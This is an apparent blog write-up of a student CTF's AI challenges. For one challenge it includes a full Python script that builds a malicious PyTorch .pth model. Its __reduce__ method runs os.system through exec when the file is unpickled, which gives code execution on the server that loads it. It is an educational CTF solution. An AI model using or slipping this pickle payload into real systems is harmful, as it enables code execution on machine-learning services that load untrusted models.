news 2026/2/12 11:37:44

【AI】2025 0x401新生交流赛 wp

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【AI】2025 0x401新生交流赛 wp

目录

许哥的数字游戏

🤫歌的😡🔥

Aura JailBreak

明阳未许

🔥🌸 LittFlower: Fire Boom! 🌸🔥


许哥的数字游戏

就是用题目给的数据去训练个模型识别数字

先叫ai解读下附件内容

让ai根据数据集训练个模型

把题目交互方式告诉ai,写个解题脚本拿到flag

🤫歌的😡🔥

附件内容,一个是有火的图,一个是没火的图

还是让ai训练模型&写交互

拿到flag

Aura JailBreak

明阳未许

一样是ai秒了

🔥🌸 LittFlower: Fire Boom! 🌸🔥

import torch import torch.nn as nn from torchvision import models import builtins import os class MaliciousMobileNetV2(models.MobileNetV2): def __init__(self, num_classes=2): super().__init__(num_classes=num_classes) def __reduce__(self): state_dict = self.state_dict() fake_state_dict = state_dict.copy() if "classifier.1.weight" in fake_state_dict: del fake_state_dict["classifier.1.weight"] if "classifier.1.bias" in fake_state_dict: del fake_state_dict["classifier.1.bias"] cmd = "import os; os.system('cp /flag /app/static/flag.txt')" return (builtins.eval, ( "(exec(cmd), state_dict)[1]", {'cmd': cmd, 'state_dict': fake_state_dict} )) if __name__ == '__main__': model = MaliciousMobileNetV2(num_classes=2) save_path = 'evil.pth' print(f"正在生成 Payload: {save_path} ...") torch.save(model, save_path) print("生成成功!")

上传脚本生成的.pth文件,加载模型触发pickle反序列化RCE拿到flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/10 21:28:23

读捍卫隐私08智能出行

1. 互联网电话 1.1. 和打印机一样,VoIP电话的系统更新也可以被伪造和接受 1.2. 大多数VoIP电话都有一个免提选项,让你可以在你的隔间或办公室中将某人的通话用扬声器播放 1.2.1. 意味着在电话听筒之外不仅有一个扬声器,还有一个麦克风 1.…

作者头像 李华
网站建设 2026/2/8 3:44:31

媒体专访实录:LobeChat创始人谈开源初心

LobeChat 技术架构深度解析:从容器化部署到插件生态的全栈实践 在大模型浪潮席卷全球的今天,AI 对话系统早已不再是实验室里的概念玩具。从客服机器人到个人助手,自然语言交互正成为数字世界的新入口。然而,当 OpenAI 的 ChatGPT …

作者头像 李华
网站建设 2026/2/10 12:36:21

小喵播放器 1.1.2| 一款支持视频超分的播放器,支持网页视频以及B站番剧

小喵播放器是一款基于mpv播放器内核的本地视频播放器,专为动漫观看场景进行优化。它集成了Anime4K实时超分辨率算法,在播放过程中对低分辨率动画进行画质增强。支持常见视频格式、字幕与音轨切换、播放记录、截图等基础播放器功能,并通过GLSL…

作者头像 李华
网站建设 2026/2/8 6:35:31

LobeChat待办事项提取与提醒功能实现

LobeChat待办事项提取与提醒功能实现 在日常使用聊天工具时,我们常常会随口说一句:“记得提醒我明天开会”或者“下周要交报告”。这些话听起来像是对 AI 的一次普通请求,但如果说完就忘,那它不过是一段被淹没在对话流中的信息碎…

作者头像 李华
网站建设 2026/2/11 6:38:44

LobeChat会话管理机制揭秘:让每一次对话都井然有序

LobeChat会话管理机制揭秘:让每一次对话都井然有序 在今天,AI 对话不再是简单的“你问我答”,而是逐渐演变为一种持续、多线程、跨场景的认知协作。无论是开发者调试模型输出,产品经理反复打磨提示词,还是研究人员横向…

作者头像 李华
网站建设 2026/2/11 4:41:41

JS利用分片技术实现大文件分块上传的性能优化?

作为一名前端开发工程师,我近期接手了公司一个有些年头的旧项目改造工作。这次改造的核心需求,是要给这个旧项目增添大文件上传功能,尤其得支持 10G 左右文件的上传,并且还要具备断点续传的能力。 在众多解决方案中,我…

作者头像 李华